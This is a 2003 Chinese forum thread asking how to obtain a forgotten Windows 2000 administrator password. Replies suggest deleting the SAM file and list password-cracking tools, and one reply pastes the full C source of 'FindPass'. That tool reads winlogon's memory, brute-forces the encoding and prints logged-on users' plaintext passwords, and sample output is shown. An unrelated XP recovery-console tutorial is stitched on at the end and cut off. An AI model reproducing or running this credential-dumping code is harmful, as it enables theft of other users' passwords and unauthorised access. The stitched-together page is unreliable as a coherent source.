怎样获得win2000的administrator的密码?

zhangws 2003-10-20 11:24:49

.

...全文

56 12 打赏收藏转发到动态举报

写回复

12 条回复

切换为时间正序

请发表友善的回复…

发表回复

daivd826 2003-10-20

打赏
举报

回复

为什么要获取密码！如果忘记了密码。可以直接把sam文件删除即可

Kingbirdfly 2003-10-20

打赏
举报

回复

mark

rainbow0326 2003-10-20

打赏
举报

回复

楼主是想知道超级用户的密码是什么，还是忘记了密码要恢复啊？我都晕了

icuc88 2003-10-20

打赏
举报

回复

1、使用NTAcess(http://www.sunbelt-software.com/product.cfm?id=265)工具。这个工具可以绕过系统syskey的保护(参考《Analysis of Alleged Vulnerability in Windows 2000 Syskey and the Encrypting File System》(http://www.microsoft.com/technet/security/topics/efs.asp)。该工具可以重新设置NT、2000、XP的密码通过使用经过NTAcess修改过的启动盘。

2、Passware Kit也提供一个工具(http://www.lostpassword.com/windows-xp-2000-nt.htm)用来恢复系统密码。同样，这个工具也支持各种NT系统，具体介绍可以参考它的介绍。

3、使用O&O Bluecon 2000(http://www.oosoft.com)，使用办法和上面的这些第三方软件差不多。
http://www.20cn.net/ns/hk/crack/data/20020809021027.htm

4、使用LC4破解所有用户口令
http://tee.96188.com/download/soft/crack/lc4setup.zip

icuc88 2003-10-20

打赏
举报

回复

http://expert.csdn.net/Expert/FAQ/FAQ_Index.asp?id=57919
如何找回Windows 2000的密码

rainbow0326 2003-10-20

打赏
举报

回复

好像不可以，我还没有听过可以破解SAM文件的东东，它是存放用户名和密码的

youqing0616 2003-10-20

打赏
举报

回复

http://expert.csdn.net/Expert/FAQ/FAQ_Index.asp?id=57919
如何找回Windows 2000的密码

dosenzh 2003-10-20

打赏
举报

回复

学习！

bandrui 2003-10-20

打赏
举报

回复

准备 o&oblueconxxl 4张软盘（或光盘和CD-R ）
2000安装光盘
制作修改密码盘：安装o&oblueconxxl到另外一台计算机，运行o&oblueconxxl ，按要求操作

用做好的盘启动需要修改密码的计算机，启动后在提示符下输入
passwd administraotr 空格回车
然后重新启动计算机
这时计算机的密码为空
祝你好运！

bandrui 2003-10-20

打赏
举报

回复

1.用启动盘进入系统
更名或是删除
*/winnt/system/config/sam*
再以管理员身份登录，密码为空即可

2.WINNT/2000/XP登录口令破解器：
WINNT/2000/XP忘记administrator密码怎么办？一张软盘就能搞定！这可是2003年1月26日最新发布的版哦。
一,安装方法：
解压后有两个文件：ntpasswd.exe和readme.txt，先运行ntpasswd.exe，再按提示输入密码：doshome.com，最后插入一张软盘，确定，等待安装......安装完成后即可使用。
试试看

3.把你的硬盘挂到其他2000的机器上更名或是删除
*/winnt/system/config/sam*

zhangws 2003-10-20

打赏
举报

回复

我忘了administrator的密码，只能用另一个用户名登录了，我想找到密码

ravenkatte 2003-10-20

打赏
举报

回复

1、使用NTAcess(http://www.sunbelt-software.com/product.cfm?id=265)工具。这个工具可以绕过系统syskey的保护(参考《Analysis of Alleged Vulnerability in Windows 2000 Syskey and the Encrypting File System》(http://www.microsoft.com/technet/security/topics/efs.asp)。该工具可以重新设置NT、2000、XP的密码通过使用经过NTAcess修改过的启动盘。

2、Passware Kit也提供一个工具(http://www.lostpassword.com/windows-xp-2000-nt.htm)用来恢复系统密码。同样，这个工具也支持各种NT系统，具体介绍可以参考它的介绍。

3、使用O&O Bluecon 2000(http://www.oosoft.com)，使用办法和上面的这些第三方软件差不多。
http://www.20cn.net/ns/hk/crack/data/20020809021027.htm

4、使用LC4破解所有用户口令
http://tee.96188.com/download/soft/crack/lc4setup.zip

// Find Password from winlogon in win2000 / winnt4 + < sp6 // // PasswordReminder.cpp --> FindPass.cpp // 1. http://www.smidgeonsoft.com/ // 2. shotgun add comment, bingle change a little to find other user in winlogon // This code is licensed under the terms of the GPL (gnu public license). // // Usage: FindPass DomainName UserName PID-of-WinLogon // // you can get the three params from pulist output in target system. // /* 因为登陆的域名和用户名是明文存储在winlogon进程里的，而PasswordReminder是限定了查找本进程用户的密码 <167-174： GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); >，然后到winlogon进程的空间中查找UserDomain和UserName < 590:// 在WinLogon的内存空间中寻找UserName和DomainName的字符串 if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) && (wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) > ，找到后就查后边的加密口令。其实只要你自己指定用户名和winlogon进程去查找就行了，只要你是管理员，任何本机用msgina.dll图形登陆的用户口令都可以找到。 1. pulist，找到系统里登陆的域名和用户名，及winlogon进程id 2. 然后给每个winlogon进程id查找指定的用户就行了。 example: C:\Documents and Settings\bingle>pulist Process PID User Idle 0 System 8 smss.exe 164 NT AUTHORITY\SYSTEM csrss.exe 192 NT AUTHORITY\SYSTEM winlogon.exe 188 NT AUTHORITY\SYSTEM wins.exe 1212 NT AUTHORITY\SYSTEM Explorer.exe 388 TEST-2KSERVER\Administrator internat.exe 1828 TEST-2KSERVER\Administrator conime.exe 1868 TEST-2KSERVER\Administrator msiexec.exe 1904 NT AUTHORITY\SYSTEM tlntsvr.exe 1048 NT AUTHORITY\SYSTEM taskmgr.exe 1752 TEST-2KSERVER\Administrator csrss.exe 2056 NT AUTHORITY\SYSTEM winlogon.exe 2416 NT AUTHORITY\SYSTEM rdpclip.exe 2448 TEST-2KSERVER\clovea Explorer.exe 2408 TEST-2KSERVER\clovea internat.exe 1480 TEST-2KSERVER\clovea cmd.exe 2508 TEST-2KSERVER\Administrator ntshell.exe 368 TEST-2KSERVER\Administrator ntshell.exe 1548 TEST-2KSERVER\Administrator ntshell.exe 1504 TEST-2KSERVER\Administrator csrss.exe 1088 NT AUTHORITY\SYSTEM winlogon.exe 1876 NT AUTHORITY\SYSTEM rdpclip.exe 1680 TEST-2KSERVER\bingle Explorer.exe 2244 TEST-2KSERVER\bingle conime.exe 2288 TEST-2KSERVER\bingle internat.exe 1592 TEST-2KSERVER\bingle cmd.exe 1692 TEST-2KSERVER\bingle mdm.exe 2476 TEST-2KSERVER\bingle taskmgr.exe 752 TEST-2KSERVER\bingle pulist.exe 2532 TEST-2KSERVER\bingle C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER administrator 188 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 188 (0x000000bc). To find TEST-2KSERVER\administrator password in process 188 ... The encoded password is found at 0x008e0800 and has a length of 10. The logon information is: TEST-2KSERVER/administrator/testserver. The hash byte is: 0x13. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER clovea 1876 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 1876 (0x00000754). To find TEST-2KSERVER\clovea password in process 1876 ... PasswordReminder is unable to find the password in memory. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER bingle 1876 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 1876 (0x00000754). To find TEST-2KSERVER\bingle password in process 1876 ... The logon information is: TEST-2KSERVER/bingle. There is no password. C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER clovea 2416 To Find Password in the Winlogon process Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon The debug privilege has been added to PasswordReminder. The WinLogon process id is 2416 (0x00000970). To find TEST-2KSERVER\clovea password in process 2416 ... The logon information is: TEST-2KSERVER/clovea. There is no password. C:\Documents and Settings\bingle> */ #include #include <windows.h> #include #include #include typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; // Undocumented typedef's typedef struct _QUERY_SYSTEM_INFORMATION { DWORD GrantedAccess; DWORD PID; WORD HandleType; WORD HandleId; DWORD Handle; } QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; typedef struct _PROCESS_INFO_HEADER { DWORD Count; DWORD Unk04; DWORD Unk08; } PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; typedef struct _PROCESS_INFO { DWORD LoadAddress; DWORD Size; DWORD Unk08; DWORD Enumerator; DWORD Unk10; char Name [0x108]; } PROCESS_INFO, *PPROCESS_INFO; typedef struct _ENCODED_PASSWORD_INFO { DWORD HashByte; DWORD Unk04; DWORD Unk08; DWORD Unk0C; FILETIME LoggedOn; DWORD Unk18; DWORD Unk1C; DWORD Unk20; DWORD Unk24; DWORD Unk28; UNICODE_STRING EncodedPassword; } ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); // Private Prototypes BOOL IsWinNT (void); BOOL IsWin2K (void); BOOL AddDebugPrivilege (void); DWORD FindWinLogon (void); BOOL LocatePasswordPageWinNT (DWORD, PDWORD); BOOL LocatePasswordPageWin2K (DWORD, PDWORD); void DisplayPasswordWinNT (void); void DisplayPasswordWin2K (void); // Global Variables PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; DWORD PasswordLength = 0; PVOID RealPasswordP = NULL; PVOID PasswordP = NULL; DWORD HashByte = 0; wchar_t UserName [0x400]; wchar_t UserDomain [0x400]; int __cdecl main( int argc, char* argv[] ) { printf( "\n\t To Find Password in the Winlogon process\n" ); printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); if ((!IsWinNT ()) && (!IsWin2K ())) { printf ("Windows NT or Windows 2000 are required.\n"); return (0); } // Add debug privilege to PasswordReminder - // this is needed for the search for Winlogon. // 增加PasswordReminder的权限 // 使得PasswordReminder可以打开并调试Winlogon进程 if (!AddDebugPrivilege ()) { printf ("Unable to add debug privilege.\n"); return (0); } printf ("The debug privilege has been added to PasswordReminder.\n"); // 获得几个未公开API的入口地址 HINSTANCE hNtDll = LoadLibrary ("NTDLL.DLL"); pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION) GetProcAddress (hNtDll, "NtQuerySystemInformation"); pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress (hNtDll, "RtlCreateQueryDebugBuffer"); pfnRtlQueryProcessDebugInformation = (PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress (hNtDll, "RtlQueryProcessDebugInformation"); pfnRtlDestroyQueryDebugBuffer = (PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress (hNtDll, "RtlDestroyQueryDebugBuffer"); pfnRtlRunDecodeUnicodeString = (PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress (hNtDll, "RtlRunDecodeUnicodeString"); // Locate WinLogon's PID - need debug privilege and admin rights. // 获得Winlogon进程的PID // 这里作者使用了几个Native API，其实使用PSAPI一样可以 DWORD WinLogonPID = argc > 3 ? atoi( argv[3] ) : FindWinLogon () ; if (WinLogonPID == 0) { printf ("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n"); printf ("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary (hNtDll); return (0); } printf("The WinLogon process id is %d (0x%8.8lx).\n", WinLogonPID, WinLogonPID); // Set values to check memory block against. // 初始化几个和用户账号相关的变量 memset(UserName, 0, sizeof (UserName)); memset(UserDomain, 0, sizeof (UserDomain)); if( argc > 2 ) { mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) ); mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) ); }else { GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); } printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID ); // Locate the block of memory containing // the password in WinLogon's memory space. // 在Winlogon进程中定位包含Password的内存块 BOOL FoundPasswordPage = FALSE; if (IsWin2K ()) FoundPasswordPage = LocatePasswordPageWin2K (WinLogonPID, &PasswordLength); else FoundPasswordPage = LocatePasswordPageWinNT (WinLogonPID, &PasswordLength); if (FoundPasswordPage) { if (PasswordLength == 0) { printf ("The logon information is: %S/%S.\n", UserDomain, UserName); printf ("There is no password.\n"); } else { printf ("The encoded password is found at 0x%8.8lx and has a length of %d.\n", RealPasswordP, PasswordLength); // Decode the password string. if (IsWin2K ()) DisplayPasswordWin2K (); else DisplayPasswordWinNT (); } } else printf ("PasswordReminder is unable to find the password in memory.\n"); FreeLibrary (hNtDll); return (0); } // main // // IsWinNT函数用来判断操作系统是否WINNT // BOOL IsWinNT (void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo)) return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); else return (FALSE); } // IsWinNT // // IsWin2K函数用来判断操作系统是否Win2K // BOOL IsWin2K (void) { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (GetVersionEx (&OSVersionInfo)) return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); else return (FALSE); } // IsWin2K // // AddDebugPrivilege函数用来申请调试Winlogon进程的特权 // BOOL AddDebugPrivilege (void) { HANDLE Token; TOKEN_PRIVILEGES TokenPrivileges, PreviousState; DWORD ReturnLength = 0; if (OpenProcessToken (GetCurrentProcess (), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token)) if (LookupPrivilegeValue (NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid)) { TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; return (AdjustTokenPrivileges (Token, FALSE, &TokenPrivileges, sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength)); } return (FALSE); } // AddDebugPrivilege // // Note that the following code eliminates the need // for PSAPI.DLL as part of the executable. // FindWinLogon函数用来寻找WinLogon进程 // 由于作者使用的是Native API，因此不需要PSAPI的支持 // DWORD FindWinLogon (void) { #define INITIAL_ALLOCATION 0x100 DWORD rc = 0; DWORD SizeNeeded = 0; PVOID InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION); // Find how much memory is required. pfnNtQuerySystemInformation (0x10, InfoP, INITIAL_ALLOCATION, &SizeNeeded); HeapFree (GetProcessHeap (), 0, InfoP); // Now, allocate the proper amount of memory. InfoP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SizeNeeded); DWORD SizeWritten = SizeNeeded; if (pfnNtQuerySystemInformation (0x10, InfoP, SizeNeeded, &SizeWritten)) { HeapFree (GetProcessHeap (), 0, InfoP); return (0); } DWORD NumHandles = SizeWritten / sizeof (QUERY_SYSTEM_INFORMATION); if (NumHandles == 0) { HeapFree (GetProcessHeap (), 0, InfoP); return (0); } PQUERY_SYSTEM_INFORMATION QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) InfoP; DWORD i; for (i = 1; i <= NumHandles; i++) { // "5" is the value of a kernel object type process. if (QuerySystemInformationP->HandleType == 5) { PVOID DebugBufferP = pfnRtlCreateQueryDebugBuffer (0, 0); if (pfnRtlQueryProcessDebugInformation (QuerySystemInformationP->PID, 1, DebugBufferP) == 0) { PPROCESS_INFO_HEADER ProcessInfoHeaderP = (PPROCESS_INFO_HEADER) ((DWORD) DebugBufferP + 0x60); DWORD Count = ProcessInfoHeaderP->Count; PPROCESS_INFO ProcessInfoP = (PPROCESS_INFO) ((DWORD) ProcessInfoHeaderP + sizeof (PROCESS_INFO_HEADER)); if (strstr (_strupr (ProcessInfoP->Name), "WINLOGON") != 0) { DWORD i; DWORD dw = (DWORD) ProcessInfoP; for (i = 0; i < Count; i++) { dw += sizeof (PROCESS_INFO); ProcessInfoP = (PPROCESS_INFO) dw; if (strstr (_strupr (ProcessInfoP->Name), "NWGINA") != 0) return (0); if (strstr (_strupr (ProcessInfoP->Name), "MSGINA") == 0) rc = QuerySystemInformationP->PID; } if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); HeapFree (GetProcessHeap (), 0, InfoP); return (rc); } } if (DebugBufferP) pfnRtlDestroyQueryDebugBuffer (DebugBufferP); } DWORD dw = (DWORD) QuerySystemInformationP; dw += sizeof (QUERY_SYSTEM_INFORMATION); QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION) dw; } HeapFree (GetProcessHeap (), 0, InfoP); return (rc); } // FindWinLogon // // LocatePasswordPageWinNT函数用来在NT中找到用户密码 // BOOL LocatePasswordPageWinNT (DWORD WinLogonPID, PDWORD PasswordLength) { #define USER_DOMAIN_OFFSET_WINNT 0x200 #define USER_PASSWORD_OFFSET_WINNT 0x400 BOOL rc = FALSE; HANDLE WinLogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, WinLogonPID); if (WinLogonHandle == 0) return (rc); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD PEB = 0x7ffdf000; DWORD BytesCopied = 0; PVOID PEBP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, SystemInfo.dwPageSize); if (!ReadProcessMemory (WinLogonHandle, (PVOID) PEB, PEBP, SystemInfo.dwPageSize, &BytesCopied)) { CloseHandle (WinLogonHandle); return (rc); } // Grab the value of the 2nd DWORD in the TEB. PDWORD WinLogonHeap = (PDWORD) ((DWORD) PEBP + (6 * sizeof (DWORD))); MEMORY_BASIC_INFORMATION MemoryBasicInformation; if (VirtualQueryEx (WinLogonHandle, (PVOID) *WinLogonHeap, &MemoryBasicInformation, sizeof (MEMORY_BASIC_INFORMATION))) if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT) && ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0)) { PVOID WinLogonMemP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, MemoryBasicInformation.RegionSize); if (ReadProcessMemory (WinLogonHandle, (PVOID) *WinLogonHeap, WinLogonMemP, MemoryBasicInformation.RegionSize, &BytesCopied)) { DWORD i = (DWORD) WinLogonMemP; DWORD UserNamePos = 0; // The order in memory is UserName followed by the UserDomain. // 在内存中搜索UserName和UserDomain字符串 do { if ((wcsicmp (UserName, (wchar_t *) i) == 0) && (wcsicmp (UserDomain, (wchar_t *) (i + USER_DOMAIN_OFFSET_WINNT)) == 0)) { UserNamePos = i; break; } i += 2; } while (i < (DWORD) WinLogonMemP + MemoryBasicInformation.RegionSize); if (UserNamePos) { PENCODED_PASSWORD_INFO EncodedPasswordInfoP = (PENCODED_PASSWORD_INFO) ((DWORD) UserNamePos + USER_PASSWORD_OFFSET_WINNT); FILETIME LocalFileTime; SYSTEMTIME SystemTime; if (FileTimeToLocalFileTime (&EncodedPasswordInfoP->LoggedOn, &LocalFileTime)) if (FileTimeToSystemTime (&LocalFileTime, &SystemTime)) printf ("You logged on at %d/%d/%d %d:%d:%d\n", SystemTime.wMonth, SystemTime.wDay, SystemTime.wYear, SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond); *PasswordLength = (EncodedPasswordInfoP->EncodedPassword.Length & 0x00ff) / sizeof (wchar_t); // NT就是好，hash-byte直接放在编码中:) HashByte = (EncodedPasswordInfoP->EncodedPassword.Length & 0xff00) >> 8; RealPasswordP = (PVOID) (*WinLogonHeap + (UserNamePos - (DWORD) WinLogonMemP) + USER_PASSWORD_OFFSET_WINNT + 0x34); PasswordP = (PVOID) ((PBYTE) (UserNamePos + USER_PASSWORD_OFFSET_WINNT + 0x34)); rc = TRUE; } } } HeapFree (GetProcessHeap (), 0, PEBP); CloseHandle (WinLogonHandle); return (rc); } // LocatePasswordPageWinNT // // LocatePasswordPageWin2K函数用来在Win2K中找到用户密码 // BOOL LocatePasswordPageWin2K (DWORD WinLogonPID, PDWORD PasswordLength) { #define USER_DOMAIN_OFFSET_WIN2K 0x400 #define USER_PASSWORD_OFFSET_WIN2K 0x800 HANDLE WinLogonHandle = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, WinLogonPID); if (WinLogonHandle == 0) return (FALSE); *PasswordLength = 0; SYSTEM_INFO SystemInfo; GetSystemInfo (&SystemInfo); DWORD i = (DWORD) SystemInfo.lpMinimumApplicationAddress; DWORD MaxMemory = (DWORD) SystemInfo.lpMaximumApplicationAddress; DWORD Increment = SystemInfo.dwPageSize; MEMORY_BASIC_INFORMATION MemoryBasicInformation; while (i < MaxMemory) { if (VirtualQueryEx (WinLogonHandle, (PVOID) i, &MemoryBasicInformation, sizeof (MEMORY_BASIC_INFORMATION))) { Increment = MemoryBasicInformation.RegionSize; if (((MemoryBasicInformation.State & MEM_COMMIT) == MEM_COMMIT) && ((MemoryBasicInformation.Protect & PAGE_GUARD) == 0)) { PVOID RealStartingAddressP = HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, MemoryBasicInformation.RegionSize); DWORD BytesCopied = 0; if (ReadProcessMemory (WinLogonHandle, (PVOID) i, RealStartingAddressP, MemoryBasicInformation.RegionSize, &BytesCopied)) { // 在WinLogon的内存空间中寻找UserName和DomainName的字符串 if ((wcsicmp ((wchar_t *) RealStartingAddressP, UserName) == 0) && (wcsicmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) { RealPasswordP = (PVOID) (i + USER_PASSWORD_OFFSET_WIN2K); PasswordP = (PVOID) ((DWORD) RealStartingAddressP + USER_PASSWORD_OFFSET_WIN2K); // Calculate the length of encoded unicode string. // 计算出密文的长度 PBYTE p = (PBYTE) PasswordP; DWORD Loc = (DWORD) p; DWORD Len = 0; if ((*p == 0) && (* (PBYTE) ((DWORD) p + 1) == 0)) ; else do { Len++; Loc += 2; p = (PBYTE) Loc; } while (*p != 0); *PasswordLength = Len; CloseHandle (WinLogonHandle); return (TRUE); } } HeapFree (GetProcessHeap (), 0, RealStartingAddressP); } } else Increment = SystemInfo.dwPageSize; // Move to next memory block. i += Increment; } CloseHandle (WinLogonHandle); return (FALSE); } // LocatePasswordPageWin2K // // DisplayPasswordWinNT函数用来在NT中解码用户密码 // void DisplayPasswordWinNT (void) { UNICODE_STRING EncodedString; EncodedString.Length = (WORD) PasswordLength * sizeof (wchar_t); EncodedString.MaximumLength = ((WORD) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t); EncodedString.Buffer = (PWSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, EncodedString.MaximumLength); CopyMemory (EncodedString.Buffer, PasswordP, PasswordLength * sizeof (wchar_t)); // Finally - decode the password. // Note that only one call is required since the hash-byte // was part of the orginally encoded string. // 在NT中，hash-byte是包含在编码中的 // 因此只需要直接调用函数解码就可以了 pfnRtlRunDecodeUnicodeString ((BYTE) HashByte, &EncodedString); printf ("The logon information is: %S/%S/%S.\n", UserDomain, UserName, EncodedString.Buffer); printf ("The hash byte is: 0x%2.2x.\n", HashByte); HeapFree (GetProcessHeap (), 0, EncodedString.Buffer); } // DisplayPasswordWinNT // // DisplayPasswordWin2K函数用来在Win2K中解码用户密码 // void DisplayPasswordWin2K (void) { DWORD i, Hash = 0; UNICODE_STRING EncodedString; EncodedString.Length = (USHORT) PasswordLength * sizeof (wchar_t); EncodedString.MaximumLength = ((USHORT) PasswordLength * sizeof (wchar_t)) + sizeof (wchar_t); EncodedString.Buffer = (PWSTR) HeapAlloc (GetProcessHeap (), HEAP_ZERO_MEMORY, EncodedString.MaximumLength); // This is a brute force technique since the hash-byte // is not stored as part of the encoded string - :>(. // 因为在Win2K中hash-byte并不存放在编码中 // 所以在这里进行的是暴力破解 // 下面的循环中i就是hash-byte // 我们将i从0x00到0xff分别对密文进行解密 // 如果有一个hash-byte使得所有密码都是可见字符，就认为是有效的 // 这个算法实际上是从概率角度来解码的 // 因为如果hash-byte不对而解密出来的密码都是可见字符的概率非常小 for (i = 0; i <= 0xff; i++) { CopyMemory (EncodedString.Buffer, PasswordP, PasswordLength * sizeof (wchar_t)); // Finally - try to decode the password. // 使用i作为hash-byte对密文进行解码 pfnRtlRunDecodeUnicodeString ((BYTE) i, &EncodedString); // Check for a viewable password. // 检查解码出的密码是否完全由可见字符组成 // 如果是则认为是正确的解码 PBYTE p = (PBYTE) EncodedString.Buffer; BOOL Viewable = TRUE; DWORD j, k; for (j = 0; (j < PasswordLength) && Viewable; j++) { if ((*p) && (* (PBYTE)(DWORD (p) + 1) == 0)) { if (*p < 0x20) Viewable = FALSE; if (*p > 0x7e) Viewable = FALSE; //0x20是空格，0X7E是~，所有密码允许使用的可见字符都包括在里面了 } else Viewable = FALSE; k = DWORD (p); k++; k++; p = (PBYTE) k; } if (Viewable) { printf ("The logon information is: %S/%S/%S.\n", UserDomain, UserName, EncodedString.Buffer); printf ("The hash byte is: 0x%2.2x.\n", i); } } HeapFree (GetProcessHeap (), 0, EncodedString.Buffer); } // DisplayPasswordWin2K // end PasswordReminder.cpp

网管教程从入门到精通软件篇 ★一。★详细的xp修复控制台命令和用法!!! 放入xp（2000）的光盘，安装时候选R，修复！ Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。　　Bootcfg 　　bootcfg 命令启动配置和故障恢复（对于大多数计算机，即 boot.ini 文件）。　　含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。　　用法：　　bootcfg /default　　设置默认引导项。　　bootcfg /add　　　　向引导列表中添加 Windows 安装。　　bootcfg /rebuild　　重复全部 Windows 安装过程并允许用户选择要添加的内容。　　注意：使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份 boot.ini 文件。　　bootcfg /scan　　　扫描用于 Windows 安装的所有磁盘并显示结果。　　注意：这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。　　bootcfg /list　　　列出引导列表中已有的条目。　　bootcfg /disableredirect 在启动引导程序中禁用重定向。　　bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings] 　　在启动引导程序中通过指定配置启用重定向。　　范例： bootcfg /redirect com1 115200 bootcfg /redirect useBiosSettings 　　hkdsk 　　创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。　　含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。　　vol [drive:] [ chkdsk [drive:] [/p] [/r] 　　参数　　无　　如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。 drive: 指定要 chkdsk 检查的驱动器。 /p　　即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱动器做任何更改。 /r　　找到坏扇区并恢复可读取的信息。隐含着 /p 参数。　　注意 Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录（默认为 %systemroot%System32）中找到该文件，将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。 Diskpart 　　创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。　　diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size] 　　参数无　　如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。　　/add 　　创建新的分区。　　/delete 　　删除现有分区。　　device_name 　　要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称：　　DeviceHardDisk0 　　drive_name 　　以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例：　　D: 　　partition_name 　　以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例：　　DeviceHardDisk0Partition1 　　大小　　要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。　　范例　　下例将删除分区： diskpart /delete Device HardDisk0 Partition3 diskpart /delete F: 　　下例将在硬盘上添加一个 20 MB 的分区：　　diskpart /add Device HardDisk0 20 　　Fixboot

